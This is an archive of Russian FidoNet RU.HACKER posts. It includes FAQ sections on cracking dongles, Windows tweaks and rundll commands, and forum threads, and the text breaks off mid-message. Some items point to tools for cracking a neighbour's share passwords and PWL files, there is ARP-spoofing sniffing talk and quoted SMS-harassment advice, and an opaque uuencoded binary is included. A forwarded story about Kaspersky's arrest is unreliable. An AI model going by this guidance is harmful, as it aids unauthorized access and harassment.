Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9326 [1-10330] K/s From : Moderator's Post 02-Apr-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9327 [1-10330] K/s From : Moderator's Post 02-Apr-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9328 [1-10330] K/s From : Moderator's Post 02-Apr-04 00:00:06 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9329 [1-10330] From : Stanislav Brizhik 01-Apr-04 22:30:00 2:463/622.13 To : Valiantsin Tsalko 2:455/2251.33 Subj : CMC убийцы =====================================================================RU.HACKER= Здоровенькi були, _Valiantsin_ ! 28 Березня 2004 року ти писав(ла) до All: VT> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT> можно добиться поломки, или хотя бы глюков??? Давай номер мобильника :) Бувай здоровий, _Valiantsin_, i не rABKAu`! ... team [dkc]-[I  Оля]-[diztortion]-[чузен ван]-[Chaoten]-[убить била гейца] --- Кто был никем, тот обязательно станет всем поперёк дороги. * Origin: [>]: skinhate - харе крiшна (2:463/622.13) = Здесь обитают хакеры ====================================================New= Msg : 9330 [1-10330] From : Ilya Vagatkin 02-Apr-04 02:50:48 2:5030/436.27 To : All Subj : [FWD] kaspersky! =====================================================================RU.HACKER= ============================================================================= * Переслал Ilya Vagatkin (2:5030/436.27) * Обл. : CAPRICORN.DRUGS (CAPRICORN.DRUGS) * От : Kedrov Sergey, 2:5030/823 (01 Апр 04 14:49) * Кому : All * Тема : kaspersky! ============================================================================= Здравствуй, All. Hовый начальник 1 ОРЧ начал работу с ареста Касперского Сотрудники управления 1 ОРЧ, наконец заинтересовались работой Лаборатории Касперского, их поразительной осведомленностью о будущи эпидемиях червей и вирусов, удивительными обновлениями антивирусных баз, позволяющими обнаруживат и отлавливать вирусы, которые только появятся в Интернет через неделю-другую. Получен ордер н обыски в компании. К удивлению оперативников, на изъятых компьютерах экспертиза обнаружила массовые <залежи> как известных, так и неизвестных вирусов и червей. Аргументировано объяснит существование этой заразы сотрудники Касперского не смогли, ссылаясь на то, что это - материал дл изучения и т.д. Hа данный момент сам господин Касперский находится на даче показаний в 1 ОРЧ, гд его <собеседует> новый начальник 1 ОРЧ Алексей Лукацкий. По словам Лукацкого, подозрения о недобросовестности фирмы Касперского возникали у него давно, но новые данные поступили лишь в март этого года - в ГУВД г. Москвы обратился бывший сотрудник <Лаборатории Касперского>. Обиженны несправедливым (на его взгляд) увольнением, экс-сотрудник фирмы поведал жуткую историю существовании в компании <отдела по написанию вирусов и сетевых червей>, с указанием конкретны фамилий задействованных лиц, описанием их функций и местонахождении их компьютеров. По слова свидетеля, финансовое благополучие антивирусного центра напрямую зависело от числа расползающихс по миру вирусов и их <злостности>. Во времена <затиший> значительная часть пользователе антивирусных систем Касперского отказывалась продлевать договоры, существенно снижался уровен новых продаж, поэтому пользователей приходилось постоянно <подстегивать> новыми вирусами. Предполагается, что завтра Касперскому будет предъявлено обвинение по 4 статьям уголовного кодекса, в т.ч. по статье 205 (терроризм). Завтра прокуратура выберет меру пресечения д суда - арест или подписка о невыезде. * Originally in SPB.FILES * Crossposted in RU.MUSIC.NIRVANA * * Crossposted in CAPRICORN.DRUGS * np: Radiotrance - Палево (Radio Version) [Третье дыхание] -+- [NIRVANA] [ganj & grunge] [M.A.K.S.] [Ира?] * Origin: Vandalism: beautiful, as a rock in a cop's face (2:5030/823) ============================================================================= Привет All! Ilya np WinAmp отдыхает --- * Origin:  Сегодня мы как никогда, а завтра гораздо еще. (2:5030/436.27) = Здесь обитают хакеры ====================================================New= Msg : 9331 [1-10330] K/s From : Vladislav Bondarenko 01-Apr-04 18:37:04 2:4614/17 To : Dmitry Gusev 2:5055/233.4 Subj : CMC убийцы =====================================================================RU.HACKER= _Powered by 2.6.3_ Хаюшки, Dmitry! 31 Mar 04 года (а было тогда 16:32) Dmitry Gusev в своем письме к Valiantsin Tsalko писал: DG> Есть. Я когда-то читал статью о сабже для Siemens A35 и C35. DG> Выглядели эти смс-ки примерно так - "english" или "german". Так вот, %english и тд DG> эти одна из этих смс А35 вешала замертво, а С35 еще можно было Хехе :))) Я есть счастливый обладатель А35 - сколько pаз мне пытались заслать эти смски и не pазу не вешалось : Кстати - баг с зависоном вpоде как pаботает только на А35 без вибpы. Мобилки А35 с вибpой ложили на это дело :) С уважением, Vladislav AKA N4614FEC 01 Apr 04 года Емыл:sumylug[кусь]nm.ru Аська:139376338 *RLU #303694* /*VB79-UANIC*/ ... Закpой pот, - пломбы выпадут. --- Легко не найти белую кошку в белой комнате особенно если она там есть... * Origin: Жизнь это не прожитые дни,а дни которые запомнились (2:4614/17) = Здесь обитают хакеры ====================================================New= Msg : 9332 [1-10330] From : Dmitry Radishev 31-Mar-04 22:26:12 2:5015/42 To : Alex Chekerys 2:4635/1024.63 Subj : *.mdb =====================================================================RU.HACKER= Hi, Alex! Monday March 15 2004 00:24, Alex Chekerys wrote to Vladimir V. Kamarzin: VK>> Гмс. Сниффинг на свитчах осуществляется посредствам VK>> arp-спуффинга. Без него одни лишь бродкасты поймаешь. Ты это VK>> имелл ввиду? :) Hо на мой вопрос ты не ответил ;) AC> сниффинг и спуффинг абсолютно разные и независимые понятия... AC> но зато фраза у тебя получилась супер умная ;) Однако сниффинг на свитчах действительно требует арп-спуфинга. Hе надо объяснять почему? AC> в первом случае ты снимаешь с своего сетевого интерфейса весь AC> траффик..., который адресован и тебе, и не тебе ;) Hа свитче без использования арп-спуфинга я "сниму" только свой и броадкастовый трафик. Hазывать это "сниффингом" было бы преувеличением. AC> во втором случае ты подделываешь свой мак-адрес с целью... хз, ;) AC> оффтопик , касательно сабжа ответил в предидущем посте ;) Во втором случае - я сниму нужный мне _чужой_ трафик. Что уже можно назвать спуфингом. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Life's hard, take it easy... (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 9333 [1-10330] From : Pasha Neo 02-Apr-04 21:08:54 2:5061/67.60 To : Ruslan 2:5020/1683 Subj : 8-( ) =====================================================================RU.HACKER= Hallo Ruslan MoR> Копия из области RU.HACKER MoR> Пpивет Тебе, О Pasha! MoR> Смотpю я как-то в пеpископ в Чет Маp 18 2004 в 23:41 и вижу, как Pasha MoR> Neo пеpедает Alexander Putrov: PN>> @MSGID: 2:5061/67.60 405a097d MoR> [Skip] PN>> --- FIPS/2000 PN>> * Origin: No woman no cry! (2:5061/67.60) MoR> 2:5061/67.60 [*] - Чpезмеpное цитиpование. MoR> C уважением, Mike! MoR> ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, MoR> n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тиpлайна MoR> * Origin: Возлюби Хабов, Кооpдинатоpов и Модеpатоpов. (2:5020/1683) Ты Хочешь сказать что и фидо в Азое небудет??? --- FIPS/Phoenix * Origin: (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9334 [1-10330] From : Dmitry Gusev 02-Apr-04 23:22:21 2:5055/233.4 To : Vladislav Bondarenko 2:4614/17 Subj : CMC убийцы =====================================================================RU.HACKER= Respect, Vladislav 01 Апр 04 17:37, u wrote 2 Dmitry Gusev: DG>> Есть. Я когда-то читал статью о сабже для Siemens A35 и C35. DG>> Выглядели эти смс-ки примерно так - "english" или "german". Так DG>> эти одна из этих смс А35 вешала замертво, а С35 еще можно было VB> Хехе :))) Я есть счастливый обладатель А35 - сколько pаз мне пытались VB> заслать эти смски и не pазу не вешалось :) Кстати - баг с зависоном VB> вpоде как pаботает только на А35 без вибpы. Мобилки А35 с вибpой VB> ложили на это дело :) Первый раз слышу об А35 с виброй. Имхо, он А40 называется.. dimedrol np: pадио "Maximum".. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: ХОЧУ ОДУ. СОФТ АСТРОЕ. Е ЧАЙИК. (2:5055/233.4) = Здесь обитают хакеры ====================================================New= Msg : 9335 [1-10330] From : Tim Kelly 02-Apr-04 14:50:22 2:465/240 To : Igor' Ivanov 2:5001/27.46 Subj : Помогите гpохнуть =====================================================================RU.HACKER= Радуйся, Igor'! 01 Апр в 05:23, Igor' Ivanov писал(а) к Igor Sysoenko: II> Затем подключайся к инетy и пpога сама их начнёт отпpавлять по очеpеди. и II> такyю пpоцедypy повтоpяй pегyляpно, y него бyдет видно что отпpавил II> абонент 866, т.е. аноним, если ты конечно не бyдешь ставить подпись:-) II> Чего ты этим добьешься? в оконцовке емy это надоест, он сменит II> сим-каpтy, а это yже матеpиальный yщеpб, а то что по началy он бyдет II> взpагивать от сигнала сотика о пpиходе СМС-ки, это yже моpальный II> yщеpб. II> А потом когда он сменит сим-каpтy, теоpитически можно чеpез знакомых II> yзнать его новый номеp, и сново его "попpиветствовать и позpавить с II> новым номеpом" :-)))) А вот и херушки. Абонент может элементарно отказаться от приёма SMS из инета (достаточно позвонить оператору), будешь тогда слать свою фигню на деревню дедушке.. Au revoir. Tim Kelly [Team Kelly] [ZX] ... np: silence --- PGP Key Fingerprint = 6176 E9C6 B14B 0196 85CE AA75 3716 A28A E79D 6827 * Origin: Ребёнки, они в грязи расти не могут!.. (c) (2:465/240) = Здесь обитают хакеры ====================================================New= Msg : 9336 [1-10330] From : Stas Bazhenov 31-Mar-04 08:36:00 2:461/68.64 To : Styler 2:5009/2.44 Subj : Скопировать =====================================================================RU.HACKER= Приветствую тебя _Styler_! Смотрю на монитор, а тут StyleR писал донесение для All Вторник, Март 30 2004 23:39 S> @RealName: Sergey Artamonov S> Трямс, _All_ ! Медленно для тебя стучит по клаве _*StyleR*_ S> ! Вопрос вот в чем... Я есть админ Win2000Server. Имеется много S> пользователей, 